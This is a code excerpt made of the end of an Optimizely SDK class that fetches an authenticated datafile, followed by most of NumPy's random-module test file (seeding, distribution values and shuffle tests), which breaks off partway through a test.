super(AuthDatafilePollingConfigManager, self).__init__(*args, **kwargs)
def _set_datafile_access_token(self, datafile_access_token):
""" Checks for valid access token input and sets it. """
if not datafile_access_token:
raise optimizely_exceptions.InvalidInputException(
'datafile_access_token cannot be empty or None.')
self.datafile_access_token = datafile_access_token
def fetch_datafile(self):
""" Fetch authenticated datafile and set ProjectConfig. """
request_headers = {
enums.HTTPHeaders.AUTHORIZATION: enums.ConfigManager.AUTHORIZATION_HEADER_DATA_TEMPLATE.format(
datafile_access_token=self.datafile_access_token
)
}
if self.last_modified:
request_headers[enums.HTTPHeaders.IF_MODIFIED_SINCE] = self.last_modified
try:
response = requests.get(
self.datafile_url, headers=request_headers, timeout=enums.ConfigManager.REQUEST_TIMEOUT,
)
except requests_exceptions.RequestException as err:
self.logger.error('Fetching datafile from {} failed. Error: {}'.format(self.datafile_url, str(err)))
return
self._handle_response(response)
|
test_random.py
|
from __future__ import division, absolute_import, print_function
import warnings
import numpy as np
from numpy.testing import (
assert_, assert_raises, assert_equal, assert_warns,
assert_no_warnings, assert_array_equal, assert_array_almost_equal,
suppress_warnings
)
from numpy import random
import sys
class TestSeed(object):
def test_scalar(self):
s = np.random.RandomState(0)
assert_equal(s.randint(1000), 684)
s = np.random.RandomState(4294967295)
assert_equal(s.randint(1000), 419)
def test_array(self):
s = np.random.RandomState(range(10))
assert_equal(s.randint(1000), 468)
s = np.random.RandomState(np.arange(10))
assert_equal(s.randint(1000), 468)
s = np.random.RandomState([0])
assert_equal(s.randint(1000), 973)
s = np.random.RandomState([4294967295])
assert_equal(s.randint(1000), 265)
def test_invalid_scalar(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, np.random.RandomState, -0.5)
assert_raises(ValueError, np.random.RandomState, -1)
def test_invalid_array(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, np.random.RandomState, [-0.5])
assert_raises(ValueError, np.random.RandomState, [-1])
assert_raises(ValueError, np.random.RandomState, [4294967296])
assert_raises(ValueError, np.random.RandomState, [1, 2, 4294967296])
assert_raises(ValueError, np.random.RandomState, [1, -2, 4294967296])
def test_invalid_array_shape(self):
# gh-9832
assert_raises(ValueError, np.random.RandomState,
np.array([], dtype=np.int64))
assert_raises(ValueError, np.random.RandomState, [[1, 2, 3]])
assert_raises(ValueError, np.random.RandomState, [[1, 2, 3],
[4, 5, 6]])
class TestBinomial(object):
def test_n_zero(self):
# Tests the corner case of n == 0 for the binomial distribution.
# binomial(0, p) should be zero for any p in [0, 1].
# This test addresses issue #3480.
zeros = np.zeros(2, dtype='int')
for p in [0, .5, 1]:
assert_(random.binomial(0, p) == 0)
assert_array_equal(random.binomial(zeros, p), zeros)
def test_p_is_nan(self):
# Issue #4571.
assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial(object):
def test_basic(self):
random.multinomial(100, [0.2, 0.8])
def test_zero_probability(self):
random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])
def test_int_negative_interval(self):
assert_(-5 <= random.randint(-5, -1) < -1)
x = random.randint(-5, -1, 5)
assert_(np.all(-5 <= x))
assert_(np.all(x < -1))
def test_size(self):
# gh-3173
p = [0.5, 0.5]
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
assert_equal(np.random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
assert_equal(np.random.multinomial(1, p, np.array((2, 2))).shape,
(2, 2, 2))
assert_raises(TypeError, np.random.multinomial, 1, p,
float(1))
class TestSetState(object):
def setup(self):
self.seed = 1234567890
self.prng = random.RandomState(self.seed)
self.state = self.prng.get_state()
def test_basic(self):
old = self.prng.tomaxint(16)
self.prng.set_state(self.state)
new = self.prng.tomaxint(16)
assert_(np.all(old == new))
def test_gaussian_reset(self):
# Make sure the cached every-other-Gaussian is reset.
old = self.prng.standard_normal(size=3)
self.prng.set_state(self.state)
new = self.prng.standard_normal(size=3)
assert_(np.all(old == new))
def test_gaussian_reset_in_media_res(self):
# When the state is saved with a cached Gaussian, make sure the
# cached Gaussian is restored.
self.prng.standard_normal()
state = self.prng.get_state()
old = self.prng.standard_normal(size=3)
self.prng.set_state(state)
new = self.prng.standard_normal(size=3)
assert_(np.all(old == new))
def test_backwards_compatibility(self):
# Make sure we can accept old state tuples that do not have the
# cached Gaussian value.
old_state = self.state[:-2]
x1 = self.prng.standard_normal(size=16)
self.prng.set_state(old_state)
x2 = self.prng.standard_normal(size=16)
self.prng.set_state(self.state)
x3 = self.prng.standard_normal(size=16)
assert_(np.all(x1 == x2))
assert_(np.all(x1 == x3))
def test_negative_binomial(self):
# Ensure that the negative binomial results take floating point
# arguments without truncation.
self.prng.negative_binomial(0.5, 0.5)
class TestRandint(object):
rfunc = np.random.randint
# valid integer/boolean types
itype = [np.bool_, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
def test_unsupported_type(self):
assert_raises(TypeError, self.rfunc, 1, dtype=float)
def test_bounds_checking(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd, dtype=dt)
assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, lbnd, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, 0, dtype=dt)
def test_rng_zero_and_extremes(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
tgt = ubnd - 1
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
tgt = (lbnd + ubnd)//2
assert_equal(self.rfunc(tgt, tgt + 1, size=1000, dtype=dt), tgt)
def test_full_range(self):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
try:
self.rfunc(lbnd, ubnd, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_in_bounds_fuzz(self):
# Don't use fixed seed
np.random.seed()
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(2, ubnd, size=2**16, dtype=dt)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2, size=2**16, dtype=np.bool_)
assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_repeatability(self):
import hashlib
# We use a md5 hash of generated sequences of 1000 samples
# in the range [0, 6) for all but bool, where the range
# is [0, 2). Hashes are for little endian numbers.
tgt = {'bool': '7dd3170d7aa461d201a65f8bcf3944b0',
'int16': '1b7741b80964bb190c50d541dca1cac1',
'int32': '4dc9fcc2b395577ebb51793e58ed1a05',
'int64': '17db902806f448331b5a758d7d2ee672',
'int8': '27dd30c4e08a797063dffac2490b0be6',
'uint16': '1b7741b80964bb190c50d541dca1cac1',
'uint32': '4dc9fcc2b395577ebb51793e58ed1a05',
'uint64': '17db902806f448331b5a758d7d2ee672',
'uint8': '27dd30c4e08a797063dffac2490b0be6'}
for dt in self.itype[1:]:
np.random.seed(1234)
# view as little endian for hash
if sys.byteorder == 'little':
val = self.rfunc(0, 6, size=1000, dtype=dt)
else:
val = self.rfunc(0, 6, size=1000, dtype=dt).byteswap()
res = hashlib.md5(val.view(np.int8)).hexdigest()
assert_(tgt[np.dtype(dt).name] == res)
# bools do not depend on endianness
np.random.seed(1234)
val = self.rfunc(0, 2, size=1000, dtype=bool).view(np.int8)
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(bool).name] == res)
def test_int64_uint64_corner_case(self):
# When stored in Numpy arrays, `lbnd` is casted
# as np.int64, and `ubnd` is casted as np.uint64.
# Checking whether `lbnd` >= `ubnd` used to be
# done solely via direct comparison, which is incorrect
# because when Numpy tries to compare both numbers,
# it casts both to np.float64 because there is
# no integer superset of np.int64 and np.uint64. However,
# `ubnd` is too large to be represented in np.float64,
# causing it be round down to np.iinfo(np.int64).max,
# leading to a ValueError because `lbnd` now equals
# the new `ubnd`.
dt = np.int64
tgt = np.iinfo(np.int64).max
lbnd = np.int64(np.iinfo(np.int64).max)
ubnd = np.uint64(np.iinfo(np.int64).max + 1)
# None of these function calls should
# generate a ValueError now.
actual = np.random.randint(lbnd, ubnd, dtype=dt)
assert_equal(actual, tgt)
def test_respect_dtype_singleton(self):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
sample = self.rfunc(lbnd, ubnd, dtype=dt)
assert_equal(sample.dtype, np.dtype(dt))
for dt in (bool, int, np.compat.long):
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, dtype=dt)
assert_(not hasattr(sample, 'dtype'))
assert_equal(type(sample), dt)
class TestRandomDist(object):
# Make sure the random distribution returns the correct value for a
# given seed
def setup(self):
self.seed = 1234567890
def test_rand(self):
np.random.seed(self.seed)
actual = np.random.rand(3, 2)
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_randn(self):
np.random.seed(self.seed)
actual = np.random.randn(3, 2)
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_randint(self):
np.random.seed(self.seed)
actual = np.random.randint(-99, 99, size=(3, 2))
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
assert_array_equal(actual, desired)
def test_random_integers(self):
np.random.seed(self.seed)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = np.random.random_integers(-99, 99, size=(3, 2))
assert_(len(w) == 1)
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
assert_array_equal(actual, desired)
def test_random_integers_max_int(self):
# Tests whether random_integers can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = np.random.random_integers(np.iinfo('l').max,
np.iinfo('l').max)
assert_(len(w) == 1)
desired = np.iinfo('l').max
assert_equal(actual, desired)
def test_random_integers_deprecated(self):
with warnings.catch_warnings():
warnings.simplefilter("error", DeprecationWarning)
# DeprecationWarning raised with high == None
assert_raises(DeprecationWarning,
np.random.random_integers,
np.iinfo('l').max)
# DeprecationWarning raised with high != None
assert_raises(DeprecationWarning,
np.random.random_integers,
np.iinfo('l').max, np.iinfo('l').max)
def test_random(self):
np.random.seed(self.seed)
actual = np.random.random((3, 2))
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_choice_uniform_replace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 4)
desired = np.array([2, 3, 2, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([1, 1, 2, 2])
assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 3, replace=False)
desired = np.array([0, 1, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 3, replace=False,
p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([2, 3, 1])
assert_array_equal(actual, desired)
def test_choice_noninteger(self):
np.random.seed(self.seed)
actual = np.random.choice(['a', 'b', 'c', 'd'], 4)
desired = np.array(['c', 'd', 'c', 'd'])
assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = np.random.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3., 3)
assert_raises(ValueError, sample, [[1, 2], [3, 4]], 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
p=[[0.25, 0.25], [0.25, 0.25]])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
# gh-13087
assert_raises(ValueError, sample, [1, 2, 3], -2, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1,), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1, 1), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2,
replace=False, p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(np.random.choice(2, replace=True)))
assert_(np.isscalar(np.random.choice(2, replace=False)))
assert_(np.isscalar(np.random.choice(2, replace=True, p=p)))
assert_(np.isscalar(np.random.choice(2, replace=False, p=p)))
assert_(np.isscalar(np.random.choice([1, 2], replace=True)))
assert_(np.random.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(np.random.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(np.random.choice(2, s, replace=True)))
assert_(not np.isscalar(np.random.choice(2, s, replace=False)))
assert_(not np.isscalar(np.random.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(np.random.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(np.random.choice([1, 2], s, replace=True)))
assert_(np.random.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(np.random.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
assert_equal(np.random.choice(6, s, replace=True).shape, s)
assert_equal(np.random.choice(6, s, replace=False).shape, s)
assert_equal(np.random.choice(6, s, replace=True, p=p).shape, s)
assert_equal(np.random.choice(6, s, replace=False, p=p).shape, s)
assert_equal(np.random.choice(np.arange(6), s, replace=True).shape, s)
# Check zero-size
assert_equal(np.random.randint(0, 0, size=(3, 0, 4)).shape, (3, 0, 4))
assert_equal(np.random.randint(0, -10, size=0).shape, (0,))
assert_equal(np.random.randint(10, 10, size=0).shape, (0,))
assert_equal(np.random.choice(0, size=0).shape, (0,))
assert_equal(np.random.choice([], size=(0,)).shape, (0,))
assert_equal(np.random.choice(['a', 'b'], size=(3, 0, 4)).shape,
(3, 0, 4))
assert_raises(ValueError, np.random.choice, [], 10)
def test_choice_nan_probabilities(self):
a = np.array([42, 1, 2])
p = [None, None, None]
assert_raises(ValueError, np.random.choice, a, p=p)
def test_bytes(self):
np.random.seed(self.seed)
actual = np.random.bytes(10)
desired = b'\x82Ui\x9e\xff\x97+Wf\xa5'
assert_equal(actual, desired)
def test_shuffle(self):
# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-11442
lambda x: (np.asarray([(i, i) for i in x],
[("a", int), ("b", int)])
.view(np.recarray)),
# gh-4270
lambda x: np.asarray([(i, i) for i in x],
[("a", object), ("b", np.int32)])]:
np.random.seed(self.seed)
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
np.random.shuffle(alist)
actual = alist
desired = conv([0, 1, 9, 6, 2, 4, 5, 8, 7, 3])
assert_array_equal(actual, desired)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5, 4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for i in range(50):
np.random.shuffle(a)
assert_equal(
sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
np.random.shuffle(b)
assert_equal(
sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_beta(self):
np.random.seed(self.seed)
actual = np.random.beta(.1, .9, size=(3, 2))
desired = np.array(
[[1.45341850513746058e-02, 5.31297615662868145e-04],
[1.85366619058432324e-06, 4.19214516800110563e-03],
[1.58405155108498093e-04, 1.26252891949397652e-04]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_binomial(self):
np.random.seed(self.seed)
actual = np.random.binomial(100, .456, size=(3, 2))
desired = np.array([[37, 43],
[42, 48],
[46, 45]])
assert_array_equal(actual, desired)
def test_chisquare(self):
np.random.seed(self.seed)
actual = np.random.chisquare(50, size=(3, 2))
desired = np.array([[63.87858175501090585, 68.68407748911370447],
[65.77116116901505904, 47.09686762438974483],
[72.3828403199695174, 74.18408615260374006]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
np.random.seed(self.seed)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = np.random.mtrand.dirichlet(alpha, size=(3, 2))
desired = np.array([[[0.54539444573611562, 0.45460555426388438],
[0.62345816822039413, 0.37654183177960598]],
[[0.55206000085785778, 0.44793999914214233],
[0.58964023305154301, 0.41035976694845688]],
[[0.59266909280647828, 0.40733090719352177],
[0.56974431743975207, 0.43025568256024799]]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(np.random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(np.random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, np.random.dirichlet, p, float(1))
def test_dirichlet_bad_alpha(self):
# gh-2089
alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, np.random.mtrand.dirichlet, alpha)
def test_exponential(self):
np.random.seed(self.seed)
actual = np.random.exponential(1.1234, size=(3, 2))
desired = np.array([[1.08342649775011624, 1.00607889924557314],
[2.46628830085216721, 2.49668106809923884],
[0.68717433461363442, 1.69175666993575979]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_exponential_0(self):
assert_equal(np.random.exponential(scale=0), 0)
assert_raises(ValueError, np.random.exponential, scale=-0.)
def test_f(self):
np.random.seed(self.seed)
actual = np.random.f(12, 77, size=(3, 2))
desired = np.array([[1.21975394418575878, 1.75135759791559775],
[1.44803115017146489, 1.22108959480396262],
[1.02176975757740629, 1.34431827623300415]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gamma(self):
np.random.seed(self.seed)
actual = np.random.gamma(5, 3, size=(3, 2))
desired = np.array([[24.60509188649287182, 28.54993563207210627],
[26.13476110204064184, 12.56988482927716078],
[31.71863275789960568, 33.30143302795922011]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_gamma_0(self):
assert_equal(np.random.gamma(shape=0, scale=0), 0)
assert_raises(ValueError, np.random.gamma, shape=-0., scale=-0.)
def test_geometric(self):
np.random.seed(self.seed)
actual = np.random.geometric(.123456789, size=(3, 2))
desired = np.array([[8, 7],
[17, 17],
[5, 12]])
assert_array_equal(actual, desired)
def test_gumbel(self):
np.random.seed(self.seed)
actual = np.random.gumbel(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.19591898743416816, 0.34405539668096674],
[-1.4492522252274278, -1.47374816298446865],
[1.10651090478803416, -0.69535848626236174]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gumbel_0(self):
assert_equal(np.random.gumbel(scale=0), 0)
assert_raises(ValueError, np.random.gumbel, scale=-0.)
def test_hypergeometric(self):
np.random.seed(self.seed)
actual = np.random.hypergeometric(10, 5, 14, size=(3, 2))
desired = np.array([[10, 10],
[10, 10],
[9, 9]])
assert_array_equal(actual, desired)
# Test nbad = 0
actual = np.random.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
assert_array_equal(actual, desired)
actual = np.random.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
assert_array_equal(actual, desired)
# Test ngood = 0
actual = np.random.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
actual = np.random.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
def test_laplace(self):
np.random.seed(self.seed)
actual = np.random.laplace(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.66599721112760157, 0.52829452552221945],
[3.12791959514407125, 3.18202813572992005],
[-0.05391065675859356, 1.74901336242837324]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_laplace_0(self):
assert_equal(np.random.laplace(scale=0), 0)
assert_raises(ValueError, np.random.laplace, scale=-0.)
def test_logistic(self):
np.random.seed(self.seed)
actual = np.random.logistic(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[1.09232835305011444, 0.8648196662399954],
[4.27818590694950185, 4.33897006346929714],
[-0.21682183359214885, 2.63373365386060332]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_lognormal(self):
np.random.seed(self.seed)
actual = np.random.lognormal(mean=.123456789, sigma=2.0, size=(3, 2))
desired = np.array([[16.50698631688883822, 36.54846706092654784],
[22.67886599981281748, 0.71617561058995771],
[65.72798501792723869, 86.84341601437161273]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_lognormal_0(self):
assert_equal(np.random.lognormal(sigma=0), 1)
assert_raises(ValueError, np.random.lognormal, sigma=-0.)
def test_logseries(self):
np.random.seed(self.seed)
actual = np.random.logseries(p=.923456789, size=(3, 2))
desired = np.array([[2, 2],
[6, 17],
[3, 6]])
assert_array_equal(actual, desired)
def test_multinomial(self):
np.random.seed(self.seed)
actual = np.random.multinomial(20, [1/6.]*6, size=(3, 2))
desired = np.array([[[4, 3, 5, 4, 2, 2],
[5, 2, 8, 2, 2, 1]],
[[3, 4, 3, 6, 0, 4],
[2, 1, 4, 3, 6, 4]],
[[4, 4, 2, 5, 2, 3],
[4, 3, 4, 2, 3, 4]]])
assert_array_equal(actual, desired)
def test_multivariate_normal(self):
np.random.seed(self.seed)
mean = (.123456789, 10)
cov = [[1, 0], [0, 1]]
size = (3, 2)
actual = np.random.multivariate_normal(mean, cov, size)
desired = np.array([[[1.463620246718631, 11.73759122771936],
[1.622445133300628, 9.771356667546383]],
[[2.154490787682787, 12.170324946056553],
[1.719909438201865, 9.230548443648306]],
[[0.689515026297799, 9.880729819607714],
[-0.023054015651998, 9.201096623542879]]])
assert_array_almost_equal(actual, desired, decimal=15)
# Check for default size, was raising deprecation warning
actual = np.random.multivariate_normal(mean, cov)
desired = np.array([0.895289569463708, 9.17180864067987])
assert_array_almost_equal(actual, desired, decimal=15)
# Check that non positive-semidefinite covariance warns with
# RuntimeWarning
mean = [0, 0]
cov = [[1, 2], [2, 1]]
assert_warns(RuntimeWarning, np.random.multivariate_normal, mean, cov)
# and that it doesn't warn with RuntimeWarning check_valid='ignore'
assert_no_warnings(np.random.multivariate_normal, mean, cov,
check_valid='ignore')
# and that it raises with RuntimeWarning check_valid='raises'
assert_raises(ValueError, np.random.multivariate_normal, mean, cov,
check_valid='raise')
cov = np.array([[1, 0.1], [0.1, 1]], dtype=np.float32)
with suppress_warnings() as sup:
np.random.multivariate_normal(mean, cov)
w = sup.record(RuntimeWarning)
assert len(w) == 0
def test_negative_binomial(self):
np.random.seed(self.seed)
actual = np.random.negative_binomial(n=100, p=.12345, size=(3, 2))
desired = np.array([[848, 841],
[892, 611],
[779, 647]])
assert_array_equal(actual, desired)
def test_noncentral_chisquare(self):
np.random.seed(self.seed)
actual = np.random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array([[23.91905354498517511, 13.35324692733826346],
[31.22452661329736401, 16.60047399466177254],
[5.03461598262724586, 17.94973089023519464]])
assert_array_almost_equal(actual, desired, decimal=14)
actual = np.random.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
desired = np.array([[1.47145377828516666, 0.15052899268012659],
[0.00943803056963588, 1.02647251615666169],
[0.332334982684171, 0.15451287602753125]])
assert_array_almost_equal(actual, desired, decimal=14)
np.random.seed(self.seed)
actual = np.random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
desired = np.array([[9.597154162763948, 11.725484450296079],
[10.413711048138335, 3.694475922923986],
[13.484222138963087, 14.377255424602957]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f(self):
np.random.seed(self.seed)
actual = np.random.noncentral_f(dfnum=5, dfden=2, nonc=1,
size=(3, 2))
desired = np.array([[1.40598099674926669, 0.34207973179285761],
[3.57715069265772545, 7.92632662577829805],
[0.43741599463544162, 1.1774208752428319]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
np.random.seed(self.seed)
actual = np.random.normal(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[2.80378370443726244, 3.59863924443872163],
[3.121433477601256, -0.33382987590723379],
[4.18552478636557357, 4.46410668111310471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_normal_0(self):
assert_equal(np.random.normal(scale=0), 0)
assert_raises(ValueError, np.random.normal, scale=-0.)
def test_pareto(self):
np.random.seed(self.seed)
actual = np.random.pareto(a=.123456789, size=(3, 2))
desired = np.array(
[[2.46852460439034849e+03, 1.41286880810518346e+03],
[5.28287797029485181e+07, 6.57720981047328785e+07],
[1.40840323350391515e+02, 1.98390255135251704e+05]])
# For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
# matrix differs by 24 nulps. Discussion:
# https://mail.python.org/pipermail/numpy-discussion/2012-September/063801.html
# Consensus is that this is probably some gcc quirk that affects
# rounding but not in any important way, so we just use a looser
# tolerance on this test:
np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
def test_poisson(self):
np.random.seed(self.seed)
actual = np.random.poisson(lam=.123456789, size=(3, 2))
desired = np.array([[0, 0],
[1, 0],
[0, 0]])
assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo('l').max
lamneg = -1
assert_raises(ValueError, np.random.poisson, lamneg)
assert_raises(ValueError, np.random.poisson, [lamneg]*10)
assert_raises(ValueError, np.random.poisson, lambig)
assert_raises(ValueError, np.random.poisson, [lambig]*10)
def test_power(self):
np.random.seed(self.seed)
actual = np.random.power(a=.123456789, size=(3, 2))
desired = np.array([[0.02048932883240791, 0.01424192241128213],
[0.38446073748535298, 0.39499689943484395],
[0.00177699707563439, 0.13115505880863756]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_rayleigh(self):
np.random.seed(self.seed)
actual = np.random.rayleigh(scale=10, size=(3, 2))
desired = np.array([[13.8882496494248393, 13.383318339044731],
[20.95413364294492098, 21.08285015800712614],
[11.06066537006854311, 17.35468505778271009]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_rayleigh_0(self):
assert_equal(np.random.rayleigh(scale=0), 0)
assert_raises(ValueError, np.random.rayleigh, scale=-0.)
def test_standard_cauchy(self):
np.random.seed(self.seed)
actual = np.random.standard_cauchy(size=(3, 2))
desired = np.array([[0.77127660196445336, -6.55601161955910605],
[0.93582023391158309, -2.07479293013759447],
[-4.74601644297011926, 0.18338989290760804]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential(self):
np.random.seed(self.seed)
actual = np.random.standard_exponential(size=(3, 2))
desired = np.array([[0.96441739162374596, 0.89556604882105506],
[2.1953785836319808, 2.22243285392490542],
[0.6116915921431676, 1.50592546727413201]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_gamma(self):
np.random.seed(self.seed)
actual = np.random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[5.50841531318455058, 6.62953470301903103],
[5.93988484943779227, 2.31044849402133989],
[7.54838614231317084, 8.012756093271868]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_gamma_0(self):
assert_equal(np.random.standard_gamma(shape=0), 0)
assert_raises(ValueError, np.random.standard_gamma, shape=-0.)
def test_standard_normal(self):
np.random.seed(self.seed)
actual = np.random.standard_normal(size=(3, 2))
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_t(self):
np.random.seed(self.seed)
actual = np.random.standard_t(df=10, size=(3, 2))
desired = np.array([[0.97140611862659965, -0.08830486548450577],
[1.36311143689505321, -0.55317463909867071],
[-0.18473749069684214, 0.61181537341755321]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_triangular(self):
np.random.seed(self.seed)
